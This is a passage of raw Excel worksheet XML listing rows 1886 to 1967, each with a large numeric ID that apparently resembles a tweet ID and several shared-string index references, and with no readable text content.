      <c r="C1886" t="s">
        <v>1</v>
      </c>
      <c r="D1886" t="s">
        <v>4887</v>
      </c>
      <c r="E1886" t="s">
        <v>4888</v>
      </c>
    </row>
    <row r="1887" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1887">
        <v>1.23527378223693E+18</v>
      </c>
      <c r="B1887" t="s">
        <v>4889</v>
      </c>
      <c r="C1887" t="s">
        <v>1</v>
      </c>
      <c r="D1887" t="s">
        <v>4890</v>
      </c>
      <c r="E1887" t="s">
        <v>4891</v>
      </c>
    </row>
    <row r="1888" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1888">
        <v>1.23527363333506E+18</v>
      </c>
      <c r="B1888" t="s">
        <v>4892</v>
      </c>
      <c r="C1888" t="s">
        <v>1</v>
      </c>
      <c r="D1888" t="s">
        <v>4893</v>
      </c>
      <c r="E1888" t="s">
        <v>4894</v>
      </c>
    </row>
    <row r="1889" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1889">
        <v>1.23527248854591E+18</v>
      </c>
      <c r="B1889" t="s">
        <v>4895</v>
      </c>
      <c r="C1889" t="s">
        <v>1</v>
      </c>
      <c r="D1889" t="s">
        <v>4896</v>
      </c>
      <c r="E1889" t="s">
        <v>4897</v>
      </c>
    </row>
    <row r="1890" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1890">
        <v>1.2352721380488399E+18</v>
      </c>
      <c r="B1890" t="s">
        <v>4898</v>
      </c>
      <c r="C1890" t="s">
        <v>1</v>
      </c>
      <c r="D1890" t="s">
        <v>4899</v>
      </c>
      <c r="E1890" t="s">
        <v>460</v>
      </c>
    </row>
    <row r="1891" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1891">
        <v>1.2352718116313201E+18</v>
      </c>
      <c r="B1891" t="s">
        <v>4900</v>
      </c>
      <c r="C1891" t="s">
        <v>1</v>
      </c>
      <c r="D1891" t="s">
        <v>4901</v>
      </c>
      <c r="E1891" t="s">
        <v>117</v>
      </c>
    </row>
    <row r="1892" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1892">
        <v>1.2352716597053E+18</v>
      </c>
      <c r="B1892" t="s">
        <v>4902</v>
      </c>
      <c r="C1892" t="s">
        <v>1</v>
      </c>
      <c r="D1892" t="s">
        <v>4903</v>
      </c>
      <c r="E1892" t="s">
        <v>4904</v>
      </c>
    </row>
    <row r="1893" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1893">
        <v>1.2352716123346601E+18</v>
      </c>
      <c r="B1893" t="s">
        <v>4905</v>
      </c>
      <c r="C1893" t="s">
        <v>1</v>
      </c>
      <c r="D1893" t="s">
        <v>4906</v>
      </c>
      <c r="E1893" t="s">
        <v>2071</v>
      </c>
    </row>
    <row r="1894" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1894">
        <v>1.23526982348514E+18</v>
      </c>
      <c r="B1894" t="s">
        <v>4907</v>
      </c>
      <c r="C1894" t="s">
        <v>1</v>
      </c>
      <c r="D1894" t="s">
        <v>4908</v>
      </c>
      <c r="E1894" t="s">
        <v>1894</v>
      </c>
    </row>
    <row r="1895" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1895">
        <v>1.2352698233551099E+18</v>
      </c>
      <c r="B1895" t="s">
        <v>4907</v>
      </c>
      <c r="C1895" t="s">
        <v>1</v>
      </c>
      <c r="D1895" t="s">
        <v>4909</v>
      </c>
      <c r="E1895" t="s">
        <v>1894</v>
      </c>
    </row>
    <row r="1896" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1896">
        <v>1.2352698232250399E+18</v>
      </c>
      <c r="B1896" t="s">
        <v>4907</v>
      </c>
      <c r="C1896" t="s">
        <v>1</v>
      </c>
      <c r="D1896" t="s">
        <v>4910</v>
      </c>
      <c r="E1896" t="s">
        <v>1894</v>
      </c>
    </row>
    <row r="1897" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1897">
        <v>1.2352698230320599E+18</v>
      </c>
      <c r="B1897" t="s">
        <v>4907</v>
      </c>
      <c r="C1897" t="s">
        <v>1</v>
      </c>
      <c r="D1897" t="s">
        <v>4911</v>
      </c>
      <c r="E1897" t="s">
        <v>1894</v>
      </c>
    </row>
    <row r="1898" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1898">
        <v>1.2352698230194801E+18</v>
      </c>
      <c r="B1898" t="s">
        <v>4907</v>
      </c>
      <c r="C1898" t="s">
        <v>1</v>
      </c>
      <c r="D1898" t="s">
        <v>4912</v>
      </c>
      <c r="E1898" t="s">
        <v>1894</v>
      </c>
    </row>
    <row r="1899" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1899">
        <v>1.23526982294402E+18</v>
      </c>
      <c r="B1899" t="s">
        <v>4907</v>
      </c>
      <c r="C1899" t="s">
        <v>1</v>
      </c>
      <c r="D1899" t="s">
        <v>4913</v>
      </c>
      <c r="E1899" t="s">
        <v>1894</v>
      </c>
    </row>
    <row r="1900" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1900">
        <v>1.23526956405485E+18</v>
      </c>
      <c r="B1900" t="s">
        <v>4914</v>
      </c>
      <c r="C1900" t="s">
        <v>1</v>
      </c>
      <c r="D1900" t="s">
        <v>4915</v>
      </c>
      <c r="E1900" t="s">
        <v>4916</v>
      </c>
    </row>
    <row r="1901" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1901">
        <v>1.23526900941246E+18</v>
      </c>
      <c r="B1901" t="s">
        <v>4917</v>
      </c>
      <c r="C1901" t="s">
        <v>1</v>
      </c>
      <c r="D1901" t="s">
        <v>4918</v>
      </c>
      <c r="E1901" t="s">
        <v>4919</v>
      </c>
    </row>
    <row r="1902" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1902">
        <v>1.2352685802221599E+18</v>
      </c>
      <c r="B1902" t="s">
        <v>4920</v>
      </c>
      <c r="C1902" t="s">
        <v>1</v>
      </c>
      <c r="D1902" t="s">
        <v>4921</v>
      </c>
      <c r="E1902" t="s">
        <v>4922</v>
      </c>
    </row>
    <row r="1903" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1903">
        <v>1.23526786059281E+18</v>
      </c>
      <c r="B1903" t="s">
        <v>4923</v>
      </c>
      <c r="C1903" t="s">
        <v>1</v>
      </c>
      <c r="D1903" t="s">
        <v>4924</v>
      </c>
      <c r="E1903" t="s">
        <v>4925</v>
      </c>
    </row>
    <row r="1904" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1904">
        <v>1.2352675642734001E+18</v>
      </c>
      <c r="B1904" t="s">
        <v>4926</v>
      </c>
      <c r="C1904" t="s">
        <v>1</v>
      </c>
      <c r="D1904" t="s">
        <v>4927</v>
      </c>
      <c r="E1904" t="s">
        <v>4928</v>
      </c>
    </row>
    <row r="1905" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1905">
        <v>1.23526753495538E+18</v>
      </c>
      <c r="B1905" t="s">
        <v>4929</v>
      </c>
      <c r="C1905" t="s">
        <v>1</v>
      </c>
      <c r="D1905" t="s">
        <v>4930</v>
      </c>
      <c r="E1905" t="s">
        <v>1828</v>
      </c>
    </row>
    <row r="1906" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1906">
        <v>1.2352675349135099E+18</v>
      </c>
      <c r="B1906" t="s">
        <v>4929</v>
      </c>
      <c r="C1906" t="s">
        <v>1</v>
      </c>
      <c r="D1906" t="s">
        <v>4931</v>
      </c>
      <c r="E1906" t="s">
        <v>1828</v>
      </c>
    </row>
    <row r="1907" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1907">
        <v>1.23526753490511E+18</v>
      </c>
      <c r="B1907" t="s">
        <v>4929</v>
      </c>
      <c r="C1907" t="s">
        <v>1</v>
      </c>
      <c r="D1907" t="s">
        <v>4932</v>
      </c>
      <c r="E1907" t="s">
        <v>1828</v>
      </c>
    </row>
    <row r="1908" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1908">
        <v>1.2352675348840801E+18</v>
      </c>
      <c r="B1908" t="s">
        <v>4929</v>
      </c>
      <c r="C1908" t="s">
        <v>1</v>
      </c>
      <c r="D1908" t="s">
        <v>4933</v>
      </c>
      <c r="E1908" t="s">
        <v>1828</v>
      </c>
    </row>
    <row r="1909" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1909">
        <v>1.2352675348462899E+18</v>
      </c>
      <c r="B1909" t="s">
        <v>4929</v>
      </c>
      <c r="C1909" t="s">
        <v>1</v>
      </c>
      <c r="D1909" t="s">
        <v>4934</v>
      </c>
      <c r="E1909" t="s">
        <v>1828</v>
      </c>
    </row>
    <row r="1910" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1910">
        <v>1.23526753482962E+18</v>
      </c>
      <c r="B1910" t="s">
        <v>4929</v>
      </c>
      <c r="C1910" t="s">
        <v>1</v>
      </c>
      <c r="D1910" t="s">
        <v>4935</v>
      </c>
      <c r="E1910" t="s">
        <v>1828</v>
      </c>
    </row>
    <row r="1911" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1911">
        <v>1.2352675348001999E+18</v>
      </c>
      <c r="B1911" t="s">
        <v>4929</v>
      </c>
      <c r="C1911" t="s">
        <v>1</v>
      </c>
      <c r="D1911" t="s">
        <v>4936</v>
      </c>
      <c r="E1911" t="s">
        <v>1828</v>
      </c>
    </row>
    <row r="1912" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1912">
        <v>1.2352675347918799E+18</v>
      </c>
      <c r="B1912" t="s">
        <v>4929</v>
      </c>
      <c r="C1912" t="s">
        <v>1</v>
      </c>
      <c r="D1912" t="s">
        <v>4937</v>
      </c>
      <c r="E1912" t="s">
        <v>1828</v>
      </c>
    </row>
    <row r="1913" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1913">
        <v>1.23526753441438E+18</v>
      </c>
      <c r="B1913" t="s">
        <v>4929</v>
      </c>
      <c r="C1913" t="s">
        <v>1</v>
      </c>
      <c r="D1913" t="s">
        <v>4938</v>
      </c>
      <c r="E1913" t="s">
        <v>1828</v>
      </c>
    </row>
    <row r="1914" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1914">
        <v>1.2352672627994701E+18</v>
      </c>
      <c r="B1914" t="s">
        <v>4939</v>
      </c>
      <c r="C1914" t="s">
        <v>1</v>
      </c>
      <c r="D1914" t="s">
        <v>4940</v>
      </c>
      <c r="E1914" t="s">
        <v>4941</v>
      </c>
    </row>
    <row r="1915" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1915">
        <v>1.2352669512215099E+18</v>
      </c>
      <c r="B1915" t="s">
        <v>4942</v>
      </c>
      <c r="C1915" t="s">
        <v>1</v>
      </c>
      <c r="D1915" t="s">
        <v>4943</v>
      </c>
      <c r="E1915" t="s">
        <v>4944</v>
      </c>
    </row>
    <row r="1916" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1916">
        <v>1.23526693015778E+18</v>
      </c>
      <c r="B1916" t="s">
        <v>4945</v>
      </c>
      <c r="C1916" t="s">
        <v>1</v>
      </c>
      <c r="D1916" t="s">
        <v>4946</v>
      </c>
      <c r="E1916" t="s">
        <v>4947</v>
      </c>
    </row>
    <row r="1917" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1917">
        <v>1.23526687689011E+18</v>
      </c>
      <c r="B1917" t="s">
        <v>4948</v>
      </c>
      <c r="C1917" t="s">
        <v>1</v>
      </c>
      <c r="D1917" t="s">
        <v>4949</v>
      </c>
      <c r="E1917" t="s">
        <v>4950</v>
      </c>
    </row>
    <row r="1918" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1918">
        <v>1.2352667688910001E+18</v>
      </c>
      <c r="B1918" t="s">
        <v>4951</v>
      </c>
      <c r="C1918" t="s">
        <v>1</v>
      </c>
      <c r="D1918" t="s">
        <v>4952</v>
      </c>
      <c r="E1918" t="s">
        <v>4953</v>
      </c>
    </row>
    <row r="1919" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1919">
        <v>1.23526626026031E+18</v>
      </c>
      <c r="B1919" t="s">
        <v>4954</v>
      </c>
      <c r="C1919" t="s">
        <v>1</v>
      </c>
      <c r="D1919" t="s">
        <v>4955</v>
      </c>
      <c r="E1919" t="s">
        <v>4956</v>
      </c>
    </row>
    <row r="1920" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1920">
        <v>1.23526617385346E+18</v>
      </c>
      <c r="B1920" t="s">
        <v>4957</v>
      </c>
      <c r="C1920" t="s">
        <v>1</v>
      </c>
      <c r="D1920" t="s">
        <v>4958</v>
      </c>
      <c r="E1920" t="s">
        <v>4959</v>
      </c>
    </row>
    <row r="1921" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1921">
        <v>1.23526581778221E+18</v>
      </c>
      <c r="B1921" t="s">
        <v>4960</v>
      </c>
      <c r="C1921" t="s">
        <v>1</v>
      </c>
      <c r="D1921" t="s">
        <v>4961</v>
      </c>
      <c r="E1921" t="s">
        <v>4962</v>
      </c>
    </row>
    <row r="1922" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1922">
        <v>1.23526554161667E+18</v>
      </c>
      <c r="B1922" t="s">
        <v>4963</v>
      </c>
      <c r="C1922" t="s">
        <v>1</v>
      </c>
      <c r="D1922" t="s">
        <v>4964</v>
      </c>
      <c r="E1922" t="s">
        <v>4965</v>
      </c>
    </row>
    <row r="1923" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1923">
        <v>1.2352655398634299E+18</v>
      </c>
      <c r="B1923" t="s">
        <v>4963</v>
      </c>
      <c r="C1923" t="s">
        <v>1</v>
      </c>
      <c r="D1923" t="s">
        <v>4966</v>
      </c>
      <c r="E1923" t="s">
        <v>4967</v>
      </c>
    </row>
    <row r="1924" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1924">
        <v>1.23526504446162E+18</v>
      </c>
      <c r="B1924" t="s">
        <v>4968</v>
      </c>
      <c r="C1924" t="s">
        <v>1</v>
      </c>
      <c r="D1924" t="s">
        <v>4969</v>
      </c>
      <c r="E1924" t="s">
        <v>2078</v>
      </c>
    </row>
    <row r="1925" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1925">
        <v>1.2352647955086899E+18</v>
      </c>
      <c r="B1925" t="s">
        <v>4970</v>
      </c>
      <c r="C1925" t="s">
        <v>1</v>
      </c>
      <c r="D1925" t="s">
        <v>4971</v>
      </c>
      <c r="E1925" t="s">
        <v>75</v>
      </c>
    </row>
    <row r="1926" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1926">
        <v>1.2352644846939899E+18</v>
      </c>
      <c r="B1926" t="s">
        <v>4972</v>
      </c>
      <c r="C1926" t="s">
        <v>1</v>
      </c>
      <c r="D1926" t="s">
        <v>4973</v>
      </c>
      <c r="E1926" t="s">
        <v>4543</v>
      </c>
    </row>
    <row r="1927" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1927">
        <v>1.2352644091042401E+18</v>
      </c>
      <c r="B1927" t="s">
        <v>4974</v>
      </c>
      <c r="C1927" t="s">
        <v>1</v>
      </c>
      <c r="D1927" t="s">
        <v>4975</v>
      </c>
      <c r="E1927" t="s">
        <v>4976</v>
      </c>
    </row>
    <row r="1928" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1928">
        <v>1.23526438652211E+18</v>
      </c>
      <c r="B1928" t="s">
        <v>4977</v>
      </c>
      <c r="C1928" t="s">
        <v>1</v>
      </c>
      <c r="D1928" t="s">
        <v>4978</v>
      </c>
      <c r="E1928" t="s">
        <v>1665</v>
      </c>
    </row>
    <row r="1929" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1929">
        <v>1.2352642060998799E+18</v>
      </c>
      <c r="B1929" t="s">
        <v>4979</v>
      </c>
      <c r="C1929" t="s">
        <v>1</v>
      </c>
      <c r="D1929" t="s">
        <v>4980</v>
      </c>
      <c r="E1929" t="s">
        <v>4981</v>
      </c>
    </row>
    <row r="1930" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1930">
        <v>1.23526418778755E+18</v>
      </c>
      <c r="B1930" t="s">
        <v>4982</v>
      </c>
      <c r="C1930" t="s">
        <v>1</v>
      </c>
      <c r="D1930" t="s">
        <v>4983</v>
      </c>
      <c r="E1930" t="s">
        <v>4984</v>
      </c>
    </row>
    <row r="1931" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1931">
        <v>1.2352641129778199E+18</v>
      </c>
      <c r="B1931" t="s">
        <v>4985</v>
      </c>
      <c r="C1931" t="s">
        <v>1</v>
      </c>
      <c r="D1931" t="s">
        <v>4986</v>
      </c>
      <c r="E1931" t="s">
        <v>4987</v>
      </c>
    </row>
    <row r="1932" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1932">
        <v>1.2352638839939599E+18</v>
      </c>
      <c r="B1932" t="s">
        <v>4988</v>
      </c>
      <c r="C1932" t="s">
        <v>1</v>
      </c>
      <c r="D1932" t="s">
        <v>4989</v>
      </c>
      <c r="E1932" t="s">
        <v>2071</v>
      </c>
    </row>
    <row r="1933" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1933">
        <v>1.2352637697832E+18</v>
      </c>
      <c r="B1933" t="s">
        <v>4990</v>
      </c>
      <c r="C1933" t="s">
        <v>1</v>
      </c>
      <c r="D1933" t="s">
        <v>4991</v>
      </c>
      <c r="E1933" t="s">
        <v>1501</v>
      </c>
    </row>
    <row r="1934" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1934">
        <v>1.2352633053227699E+18</v>
      </c>
      <c r="B1934" t="s">
        <v>4992</v>
      </c>
      <c r="C1934" t="s">
        <v>1</v>
      </c>
      <c r="D1934" t="s">
        <v>4993</v>
      </c>
      <c r="E1934" t="s">
        <v>4994</v>
      </c>
    </row>
    <row r="1935" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1935">
        <v>1.2352631664452201E+18</v>
      </c>
      <c r="B1935" t="s">
        <v>4995</v>
      </c>
      <c r="C1935" t="s">
        <v>1</v>
      </c>
      <c r="D1935" t="s">
        <v>4996</v>
      </c>
      <c r="E1935" t="s">
        <v>4997</v>
      </c>
    </row>
    <row r="1936" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1936">
        <v>1.2352630684159401E+18</v>
      </c>
      <c r="B1936" t="s">
        <v>4998</v>
      </c>
      <c r="C1936" t="s">
        <v>1</v>
      </c>
      <c r="D1936" t="s">
        <v>4999</v>
      </c>
      <c r="E1936" t="s">
        <v>1698</v>
      </c>
    </row>
    <row r="1937" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1937">
        <v>1.23526306656206E+18</v>
      </c>
      <c r="B1937" t="s">
        <v>5000</v>
      </c>
      <c r="C1937" t="s">
        <v>1</v>
      </c>
      <c r="D1937" t="s">
        <v>5001</v>
      </c>
      <c r="E1937" t="s">
        <v>1698</v>
      </c>
    </row>
    <row r="1938" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1938">
        <v>1.2352630644313001E+18</v>
      </c>
      <c r="B1938" t="s">
        <v>5000</v>
      </c>
      <c r="C1938" t="s">
        <v>1</v>
      </c>
      <c r="D1938" t="s">
        <v>5002</v>
      </c>
      <c r="E1938" t="s">
        <v>1698</v>
      </c>
    </row>
    <row r="1939" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1939">
        <v>1.2352630627997801E+18</v>
      </c>
      <c r="B1939" t="s">
        <v>5003</v>
      </c>
      <c r="C1939" t="s">
        <v>1</v>
      </c>
      <c r="D1939" t="s">
        <v>5004</v>
      </c>
      <c r="E1939" t="s">
        <v>1698</v>
      </c>
    </row>
    <row r="1940" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1940">
        <v>1.2352630607319199E+18</v>
      </c>
      <c r="B1940" t="s">
        <v>5003</v>
      </c>
      <c r="C1940" t="s">
        <v>1</v>
      </c>
      <c r="D1940" t="s">
        <v>5005</v>
      </c>
      <c r="E1940" t="s">
        <v>1698</v>
      </c>
    </row>
    <row r="1941" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1941">
        <v>1.23526305901651E+18</v>
      </c>
      <c r="B1941" t="s">
        <v>5003</v>
      </c>
      <c r="C1941" t="s">
        <v>1</v>
      </c>
      <c r="D1941" t="s">
        <v>5006</v>
      </c>
      <c r="E1941" t="s">
        <v>1698</v>
      </c>
    </row>
    <row r="1942" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1942">
        <v>1.2352630573597801E+18</v>
      </c>
      <c r="B1942" t="s">
        <v>5007</v>
      </c>
      <c r="C1942" t="s">
        <v>1</v>
      </c>
      <c r="D1942" t="s">
        <v>5008</v>
      </c>
      <c r="E1942" t="s">
        <v>1698</v>
      </c>
    </row>
    <row r="1943" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1943">
        <v>1.2352630550487199E+18</v>
      </c>
      <c r="B1943" t="s">
        <v>5007</v>
      </c>
      <c r="C1943" t="s">
        <v>1</v>
      </c>
      <c r="D1943" t="s">
        <v>5009</v>
      </c>
      <c r="E1943" t="s">
        <v>1698</v>
      </c>
    </row>
    <row r="1944" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1944">
        <v>1.2352630532241999E+18</v>
      </c>
      <c r="B1944" t="s">
        <v>5010</v>
      </c>
      <c r="C1944" t="s">
        <v>1</v>
      </c>
      <c r="D1944" t="s">
        <v>5011</v>
      </c>
      <c r="E1944" t="s">
        <v>1698</v>
      </c>
    </row>
    <row r="1945" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1945">
        <v>1.2352630517436001E+18</v>
      </c>
      <c r="B1945" t="s">
        <v>5010</v>
      </c>
      <c r="C1945" t="s">
        <v>1</v>
      </c>
      <c r="D1945" t="s">
        <v>5012</v>
      </c>
      <c r="E1945" t="s">
        <v>1698</v>
      </c>
    </row>
    <row r="1946" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1946">
        <v>1.23526304908434E+18</v>
      </c>
      <c r="B1946" t="s">
        <v>5013</v>
      </c>
      <c r="C1946" t="s">
        <v>1</v>
      </c>
      <c r="D1946" t="s">
        <v>5014</v>
      </c>
      <c r="E1946" t="s">
        <v>495</v>
      </c>
    </row>
    <row r="1947" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1947">
        <v>1.2352630461945101E+18</v>
      </c>
      <c r="B1947" t="s">
        <v>5015</v>
      </c>
      <c r="C1947" t="s">
        <v>1</v>
      </c>
      <c r="D1947" t="s">
        <v>5016</v>
      </c>
      <c r="E1947" t="s">
        <v>495</v>
      </c>
    </row>
    <row r="1948" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1948">
        <v>1.2352625330088399E+18</v>
      </c>
      <c r="B1948" t="s">
        <v>5017</v>
      </c>
      <c r="C1948" t="s">
        <v>1</v>
      </c>
      <c r="D1948" t="s">
        <v>5018</v>
      </c>
      <c r="E1948" t="s">
        <v>5019</v>
      </c>
    </row>
    <row r="1949" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1949">
        <v>1.23526252582814E+18</v>
      </c>
      <c r="B1949" t="s">
        <v>5020</v>
      </c>
      <c r="C1949" t="s">
        <v>1</v>
      </c>
      <c r="D1949" t="s">
        <v>5021</v>
      </c>
      <c r="E1949" t="s">
        <v>4844</v>
      </c>
    </row>
    <row r="1950" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1950">
        <v>1.23526229906305E+18</v>
      </c>
      <c r="B1950" t="s">
        <v>5022</v>
      </c>
      <c r="C1950" t="s">
        <v>1</v>
      </c>
      <c r="D1950" t="s">
        <v>5023</v>
      </c>
      <c r="E1950" t="s">
        <v>1894</v>
      </c>
    </row>
    <row r="1951" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1951">
        <v>1.2352617398154601E+18</v>
      </c>
      <c r="B1951" t="s">
        <v>5024</v>
      </c>
      <c r="C1951" t="s">
        <v>1</v>
      </c>
      <c r="D1951" t="s">
        <v>5025</v>
      </c>
      <c r="E1951" t="s">
        <v>5026</v>
      </c>
    </row>
    <row r="1952" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1952">
        <v>1.2352614836485199E+18</v>
      </c>
      <c r="B1952" t="s">
        <v>5027</v>
      </c>
      <c r="C1952" t="s">
        <v>1</v>
      </c>
      <c r="D1952" t="s">
        <v>5028</v>
      </c>
      <c r="E1952" t="s">
        <v>5029</v>
      </c>
    </row>
    <row r="1953" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1953">
        <v>1.2352614808005901E+18</v>
      </c>
      <c r="B1953" t="s">
        <v>5030</v>
      </c>
      <c r="C1953" t="s">
        <v>1</v>
      </c>
      <c r="D1953" t="s">
        <v>5031</v>
      </c>
      <c r="E1953" t="s">
        <v>5032</v>
      </c>
    </row>
    <row r="1954" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1954">
        <v>1.2352611838858199E+18</v>
      </c>
      <c r="B1954" t="s">
        <v>5033</v>
      </c>
      <c r="C1954" t="s">
        <v>1</v>
      </c>
      <c r="D1954" t="s">
        <v>5034</v>
      </c>
      <c r="E1954" t="s">
        <v>1550</v>
      </c>
    </row>
    <row r="1955" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1955">
        <v>1.2352608113980001E+18</v>
      </c>
      <c r="B1955" t="s">
        <v>5035</v>
      </c>
      <c r="C1955" t="s">
        <v>1</v>
      </c>
      <c r="D1955" t="s">
        <v>5036</v>
      </c>
      <c r="E1955" t="s">
        <v>5037</v>
      </c>
    </row>
    <row r="1956" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1956">
        <v>1.23526032208637E+18</v>
      </c>
      <c r="B1956" t="s">
        <v>5038</v>
      </c>
      <c r="C1956" t="s">
        <v>1</v>
      </c>
      <c r="D1956" t="s">
        <v>5039</v>
      </c>
      <c r="E1956" t="s">
        <v>5040</v>
      </c>
    </row>
    <row r="1957" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1957">
        <v>1.2352602040669599E+18</v>
      </c>
      <c r="B1957" t="s">
        <v>5041</v>
      </c>
      <c r="C1957" t="s">
        <v>1</v>
      </c>
      <c r="D1957" t="s">
        <v>5042</v>
      </c>
      <c r="E1957" t="s">
        <v>5043</v>
      </c>
    </row>
    <row r="1958" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1958">
        <v>1.2352601081223199E+18</v>
      </c>
      <c r="B1958" t="s">
        <v>5044</v>
      </c>
      <c r="C1958" t="s">
        <v>1</v>
      </c>
      <c r="D1958" t="s">
        <v>5045</v>
      </c>
      <c r="E1958" t="s">
        <v>5046</v>
      </c>
    </row>
    <row r="1959" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1959">
        <v>1.2352600217154801E+18</v>
      </c>
      <c r="B1959" t="s">
        <v>5047</v>
      </c>
      <c r="C1959" t="s">
        <v>1</v>
      </c>
      <c r="D1959" t="s">
        <v>5048</v>
      </c>
      <c r="E1959" t="s">
        <v>5049</v>
      </c>
    </row>
    <row r="1960" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1960">
        <v>1.2352600132595799E+18</v>
      </c>
      <c r="B1960" t="s">
        <v>5050</v>
      </c>
      <c r="C1960" t="s">
        <v>1</v>
      </c>
      <c r="D1960" t="s">
        <v>5051</v>
      </c>
      <c r="E1960" t="s">
        <v>1804</v>
      </c>
    </row>
    <row r="1961" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1961">
        <v>1.2352599645387E+18</v>
      </c>
      <c r="B1961" t="s">
        <v>5052</v>
      </c>
      <c r="C1961" t="s">
        <v>1</v>
      </c>
      <c r="D1961" t="s">
        <v>5053</v>
      </c>
      <c r="E1961" t="s">
        <v>5054</v>
      </c>
    </row>
    <row r="1962" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1962">
        <v>1.23525985076386E+18</v>
      </c>
      <c r="B1962" t="s">
        <v>5055</v>
      </c>
      <c r="C1962" t="s">
        <v>1</v>
      </c>
      <c r="D1962" t="s">
        <v>5056</v>
      </c>
      <c r="E1962" t="s">
        <v>5057</v>
      </c>
    </row>
    <row r="1963" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1963">
        <v>1.23525971981343E+18</v>
      </c>
      <c r="B1963" t="s">
        <v>5058</v>
      </c>
      <c r="C1963" t="s">
        <v>1</v>
      </c>
      <c r="D1963" t="s">
        <v>5059</v>
      </c>
      <c r="E1963" t="s">
        <v>5060</v>
      </c>
    </row>
    <row r="1964" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1964">
        <v>1.23525943557824E+18</v>
      </c>
      <c r="B1964" t="s">
        <v>5061</v>
      </c>
      <c r="C1964" t="s">
        <v>1</v>
      </c>
      <c r="D1964" t="s">
        <v>5062</v>
      </c>
      <c r="E1964" t="s">
        <v>5063</v>
      </c>
    </row>
    <row r="1965" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1965">
        <v>1.2352592282285499E+18</v>
      </c>
      <c r="B1965" t="s">
        <v>5064</v>
      </c>
      <c r="C1965" t="s">
        <v>1</v>
      </c>
      <c r="D1965" t="s">
        <v>5065</v>
      </c>
      <c r="E1965" t="s">
        <v>5066</v>
      </c>
    </row>
    <row r="1966" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1966">
        <v>1.2352591537336E+18</v>
      </c>
      <c r="B1966" t="s">
        <v>5067</v>
      </c>
      <c r="C1966" t="s">
        <v>1</v>
      </c>
      <c r="D1966" t="s">
        <v>5068</v>
      </c>
      <c r="E1966" t="s">
        <v>5069</v>
      </c>
    </row>
    <row r="1967" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1967">
        <v>1.2352589861375501E+18</v>
      </c>
      <c r="B1967" t="s">
        <v>5070</v>
      </c>
      <c r="C1967" t="s">
        <v>1</v>
      </c>
      <c r="D1967" t="s">
        <v>5071</v>
